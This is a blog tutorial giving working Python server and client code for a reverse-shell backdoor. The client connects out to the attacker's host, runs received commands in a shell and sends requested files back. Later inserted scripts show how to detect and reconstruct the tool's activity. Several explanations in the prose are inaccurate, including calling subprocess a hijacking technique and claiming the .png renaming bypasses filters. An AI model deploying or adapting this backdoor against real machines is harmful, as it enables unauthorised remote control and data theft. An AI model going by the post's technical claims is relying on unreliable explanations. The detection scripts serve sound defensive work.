Python data_exfiltration with socket programming and network

December 19, 2017


Data exfiltration is the technique an attacker uses to transfer data from a victim's computer to the attacker's computer without authorization. The attacker uploads a malicious program to the remote computer; once the victim's computer is infected, the attacker takes control of it and starts exfiltrating data or files to their own computer. Another name for this kind of attack is data extrusion; both terms mean the same thing.

Socket programming is how a running process on one computer communicates with a process on another computer. Most often that communication happens over the internet. It is implemented through an API (Application Programming Interface) that talks to the protocol stack.

The protocol stack here is TCP/IP: the TCP and UDP protocols, combined with an IP address and a port number, carry information, packets and data across the network. In this tutorial the transfer is also controlled by subprocesses. But what is a subprocess? In simple terms, a subprocess is a technique for taking control of another process: hijacking it, spawning it, or redirecting one process into another.

Now I want to explain how to program data exfiltration with socket programming and networking in the Python language.

The first computer is server A, running Kali Linux. Configure its interface:

root# ifconfig eth0 192.168.1.15 netmask 255.255.255.0 up

data_exfiltration_server.py

#!/usr/bin/env python
# Python 2 code (print statement, raw_input), as in the original post.

import socket
import sys
import os

if len(sys.argv) <= 2:
    print "Usage: python data_exfiltration_server.py <host> <port>"
    exit()


def transfer(conn, command):
    # Send the 'grab*<path>' command to the client and write whatever it
    # sends back into a local file until the 'DONE' trailer arrives.
    conn.send(command)
    file_object = open("/home/videos/test.png", "wb")
    while True:
        bits = conn.recv(1024)
        # Same text the client sends when the requested path does not exist
        if 'Unable to find file' in bits:
            print '[-] Unable to find file'
            break
        if bits.endswith('DONE'):
            print '[+] Transfer Completed'
            file_object.close()
            break
        file_object.write(bits)


def connect_server():
    host = sys.argv[1]
    port = int(sys.argv[2])

    socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket_object.bind((host, port))
    socket_object.listen(1)
    print '[+] Listening for incoming connection'
    conn, addr = socket_object.accept()
    print '[+] We got a connection from:', addr

    while True:
        command = raw_input("shell>")
        if 'terminate' in command:
            conn.send('terminate')
            conn.close()
            break
        elif 'grab' in command:
            transfer(conn, command)
        else:
            conn.send(command)
            print conn.recv(1024)

connect_server()

Explanation of the code:

import sys >> library used for the command-line arguments (usage message)

import socket >> library for the socket API and its functions

import os >> library for controlling the operating system

def transfer(conn, command) >> function that receives the file and stores it in .png format on the server; afterwards the file is renamed back to its real format. This trick lets the attacker bypass simple filters easily.

host >> address of the server

port >> port of the server

socket.socket() >> function that creates the socket through the network API

bind() >> attaches the server socket to this address and this port so the client can connect to it

listen() >> waits for the incoming connection from the client

accept() >> accepts the incoming connection from the client

raw_input() >> reads commands at the shell> prompt once the connection with the client is established

grab >> command to transfer any file to the server

send() >> function used to send the command

recv() >> function used to receive the data that is transferred
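The explanation of transfer() above says the grabbed file is stored as test.png and renamed later, which is exactly the kind of disguise a defender can catch: a file's leading bytes (its magic number) reveal its real type no matter what the extension says. The following Python 3 script is an added example written for this page, not code from the original post; the signature table and the sample files it writes are constructed for the demonstration.

```python
# Added example (not from the original post): flag files whose content does
# not match the type their extension claims, e.g. a PE executable saved as
# .png. The MAGIC table and the sample files are constructed for this demo.
import os
import tempfile

# Well-known file signatures: leading bytes -> file type.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"MZ": "exe",          # Windows PE executables begin with the DOS 'MZ' stub
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip",
    b"\x7fELF": "elf",
}

# Extension -> type the extension claims.
EXTENSION_TYPES = {
    ".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg", ".exe": "exe",
    ".pdf": "pdf", ".zip": "zip",
}


def sniff_type(data):
    """Return the type implied by the leading bytes, or None if unknown."""
    for signature, kind in MAGIC.items():
        if data.startswith(signature):
            return kind
    return None


def check_file(path):
    """Return (claimed_type, actual_type, mismatch) for one file on disk."""
    ext = os.path.splitext(path)[1].lower()
    claimed = EXTENSION_TYPES.get(ext)
    with open(path, "rb") as fh:
        head = fh.read(16)
    actual = sniff_type(head)
    mismatch = claimed is not None and actual is not None and claimed != actual
    return claimed, actual, mismatch


def scan_directory(directory):
    """Return the paths in `directory` whose content contradicts their extension."""
    flagged = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and check_file(path)[2]:
            flagged.append(path)
    return flagged


def make_samples():
    """Write constructed sample files into a temp directory and return its path."""
    d = tempfile.mkdtemp()
    # A genuine PNG header followed by filler bytes.
    with open(os.path.join(d, "photo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    # A PE stub stored under a .png name, as the server in this post does.
    with open(os.path.join(d, "test.png"), "wb") as fh:
        fh.write(b"MZ\x90\x00" + b"\x00" * 60)
    # A ZIP archive whose extension is honest.
    with open(os.path.join(d, "archive.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04" + b"\x00" * 26)
    return d


if __name__ == "__main__":
    sample_dir = make_samples()
    for p in scan_directory(sample_dir):
        claimed, actual, _ = check_file(p)
        print("%s: extension says %s but content is %s" % (p, claimed, actual))
```

Run it as a script and only test.png is reported, because its content starts with the MZ stub while its name claims a PNG. The same check works on a directory of files received by any upload or transfer point; only the first 16 bytes of each file are read, so it is cheap enough to run on every write.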

Execute the code:

python data_exfiltration_server.py 192.168.1.15 8080

[+] Listening for incoming connection

Client B >> Windows 7, with its interface configured as 192.168.1.12/24

data_exfiltration_client.py

#!/usr/bin/env python
# Python 2 code ('except Exception, e' syntax), as in the original post.

import os
import socket
import subprocess


def transfer(socket_object, path):
    # Read the requested file in 1024-byte chunks and send each chunk,
    # followed by the 'DONE' trailer the server waits for.
    if os.path.exists(path):
        file_object = open(path, "rb")
        contents = file_object.read(1024)
        while contents != '':
            socket_object.send(contents)
            contents = file_object.read(1024)
        socket_object.send('DONE')
        file_object.close()
    else:
        socket_object.send('Unable to find file')


def connect_client():
    socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Server A's address and port are hard-coded; command-line arguments are ignored.
    socket_object.connect(('192.168.1.15', 8080))
    while True:
        command = socket_object.recv(1024)
        if 'terminate' in command:
            socket_object.close()
            break
        elif 'grab' in command:
            # The command has the form 'grab*<path>'
            grab, path = command.split('*')
            try:
                transfer(socket_object, path)
            except Exception, e:
                socket_object.send(str(e))
                pass
        else:
            cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            socket_object.send(cmd.stdout.read())
            socket_object.send(cmd.stderr.read())


def main():
    connect_client()

main()

Code explanation:

import os >> library for the operating system

import subprocess >> library for the subprocess functions

import socket >> library for the socket API in the network

def transfer(socket_object, path) >> this is the function that transfers the data from the client to the server: it reads the file contents and sends them to the server. A powerful function.

socket.socket() >> socket function

connect() >> connects to the server

subprocess.Popen() >> runs the command received from the server in a shell

grab >> command to grab the data and transfer the file to the server
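Because every message in this protocol is plaintext and its markers are fixed ('grab*<path>' from the server, 'DONE' or 'Unable to find file' from the client, 'terminate' to end), an incident responder holding a packet capture can replay the whole session and recover both the commands typed and the file that left the host. The Python 3 script below is an added example written for this page, not code from the original post; the captured segments it works on are constructed here, in place of a TCP stream reassembled from a real pcap, and the 'win7-pc\alice' output and paths are invented sample values.

```python
# Added example (not from the original post): reconstruct one session of the
# tool above from captured TCP payloads. CAPTURED_SEGMENTS is constructed for
# this demo; in practice it would come from a reassembled TCP stream.

SERVER_TO_CLIENT = "s2c"   # operator's shell -> infected client
CLIENT_TO_SERVER = "c2s"   # infected client -> operator's shell

# (direction, payload) for each data-carrying segment, in capture order.
CAPTURED_SEGMENTS = [
    (SERVER_TO_CLIENT, b"whoami"),
    (CLIENT_TO_SERVER, b"win7-pc\\alice\r\n"),
    (SERVER_TO_CLIENT, b"grab*C:\\Users\\alice\\secret.docx"),
    (CLIENT_TO_SERVER, b"PK\x03\x04" + b"A" * 1020),
    (CLIENT_TO_SERVER, b"B" * 300 + b"DONE"),   # last data and the trailer in one segment
    (SERVER_TO_CLIENT, b"grab*C:\\missing.txt"),
    (CLIENT_TO_SERVER, b"Unable to find file"),
    (SERVER_TO_CLIENT, b"terminate"),
]


def reconstruct_session(segments):
    """Replay the segments and return (events, files).

    events: one dict per operator command with its type and result
    files:  requested path -> bytes the client actually sent back
    """
    events, files = [], {}
    pending = None   # path of a grab whose data is still arriving
    buf = b""
    for direction, payload in segments:
        if direction == SERVER_TO_CLIENT:
            text = payload.decode("utf-8", "replace")
            if text == "terminate":
                events.append({"type": "terminate"})
            elif text.startswith("grab*"):
                pending = text.split("*", 1)[1]
                buf = b""
                events.append({"type": "grab", "path": pending})
            else:
                events.append({"type": "shell", "command": text, "output": b""})
        else:
            if pending is not None:
                if payload == b"Unable to find file":
                    events[-1]["result"] = "missing"
                    pending = None
                elif payload.endswith(b"DONE"):
                    # Keep the data that shares a segment with the trailer.
                    buf += payload[:-4]
                    files[pending] = buf
                    events[-1]["result"] = "received %d bytes" % len(buf)
                    pending = None
                else:
                    buf += payload
            elif events and events[-1]["type"] == "shell":
                events[-1]["output"] += payload
    return events, files


def indicators(segments):
    """Content signatures a network sensor could alert on for this tool."""
    hits = set()
    for direction, payload in segments:
        if direction == SERVER_TO_CLIENT and payload.startswith(b"grab*"):
            hits.add("grab command")
        if direction == SERVER_TO_CLIENT and payload == b"terminate":
            hits.add("terminate")
        if direction == CLIENT_TO_SERVER and payload.endswith(b"DONE"):
            hits.add("DONE trailer")
    return sorted(hits)


if __name__ == "__main__":
    evts, recovered = reconstruct_session(CAPTURED_SEGMENTS)
    for e in evts:
        print(e)
    for path, data in recovered.items():
        print("recovered %s (%d bytes, starts with %r)" % (path, len(data), data[:4]))
    print("indicators:", indicators(CAPTURED_SEGMENTS))
```

The indicators() function is deliberately crude: three literal strings at fixed positions in the payload are all a sensor needs to match this tool on the wire, which is the practical cost of a protocol with no encryption and no framing. Note that the reconstruction keeps data that arrives in the same segment as the 'DONE' trailer, so the responder's copy of the file can be more complete than what the operator's server wrote to disk.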

Connect the client to the server:

python data_exfiltration_client.py 192.168.1.15 8080

Now on the server the shell is open, and you can use grab to transfer a file from the remote computer:

shell> grab*file.exe

For example, if the client computer is Windows 7, you transfer the malicious file.exe to the server and execute it there.

These two programs are meant to run on two different operating systems:

Server A is Kali Linux

Client B is Windows 7
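On the Windows 7 client the tool also leaves a distinctive host footprint: a script interpreter that holds an outbound TCP connection and, for every command the operator types, spawns cmd.exe through subprocess.Popen(..., shell=True). The Python 3 detector below is an added example written for this page, not code from the original post; the event records it consumes are constructed for the demo and their field names (ts, kind, pid, image, cmdline, ppid, dst_ip, dst_port, direction) are an assumed simplification, not any EDR or Sysmon product's real schema.

```python
# Added example (not from the original post): correlate outbound network
# connections with child-shell creation per process. EVENTS and its field
# names are constructed for this demo, not a real telemetry schema.
from collections import defaultdict

INTERPRETERS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed host telemetry, one record per event, in time order.
EVENTS = [
    {"ts": 1, "kind": "process", "pid": 4242, "image": "python.exe",
     "cmdline": "python data_exfiltration_client.py", "ppid": 1000},
    {"ts": 2, "kind": "network", "pid": 4242, "image": "python.exe",
     "dst_ip": "192.168.1.15", "dst_port": 8080, "direction": "outbound"},
    {"ts": 3, "kind": "process", "pid": 4301, "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami", "ppid": 4242},
    {"ts": 4, "kind": "process", "pid": 4355, "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir C:\\Users\\alice", "ppid": 4242},
    # Benign noise: a browser with an outbound connection but no child shell.
    {"ts": 5, "kind": "process", "pid": 5000, "image": "firefox.exe",
     "cmdline": "firefox.exe", "ppid": 1000},
    {"ts": 6, "kind": "network", "pid": 5000, "image": "firefox.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443, "direction": "outbound"},
    # Benign noise: an interpreter that spawns a shell but never touches the network.
    {"ts": 7, "kind": "process", "pid": 6000, "image": "python.exe",
     "cmdline": "python build.py", "ppid": 1000},
    {"ts": 8, "kind": "process", "pid": 6001, "image": "cmd.exe",
     "cmdline": "cmd.exe /c make", "ppid": 6000},
]


def find_interactive_backdoors(events, min_shell_children=2):
    """Return one alert per interpreter process that opened an outbound
    connection and then spawned at least `min_shell_children` shells."""
    first_conn = {}                      # pid -> (ts, dst_ip, dst_port)
    image_of = {}                        # pid -> image name
    shell_children = defaultdict(list)   # parent pid -> [(ts, cmdline)]
    for ev in events:
        image_of.setdefault(ev["pid"], ev["image"])
        if ev["kind"] == "network" and ev["direction"] == "outbound":
            first_conn.setdefault(ev["pid"], (ev["ts"], ev["dst_ip"], ev["dst_port"]))
        elif ev["kind"] == "process" and ev["image"] in SHELLS:
            shell_children[ev["ppid"]].append((ev["ts"], ev["cmdline"]))

    alerts = []
    for pid, (conn_ts, ip, port) in first_conn.items():
        if image_of.get(pid) not in INTERPRETERS:
            continue
        # Only shells created after the connection was established count.
        spawned = [cmd for ts, cmd in shell_children[pid] if ts >= conn_ts]
        if len(spawned) >= min_shell_children:
            alerts.append({"pid": pid, "image": image_of[pid],
                           "remote": (ip, port), "spawned": spawned})
    return alerts


if __name__ == "__main__":
    for alert in find_interactive_backdoors(EVENTS):
        print("pid %d (%s) connected to %s:%d and spawned %d shells: %s" % (
            alert["pid"], alert["image"], alert["remote"][0], alert["remote"][1],
            len(alert["spawned"]), alert["spawned"]))
```

Only pid 4242 is reported: firefox.exe has the connection but no shell children, and the build script has shell children but no connection. The threshold and the ordering check keep a single, legitimate subprocess call from firing the rule; raising min_shell_children trades a little sensitivity for fewer false positives on administrative scripts.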
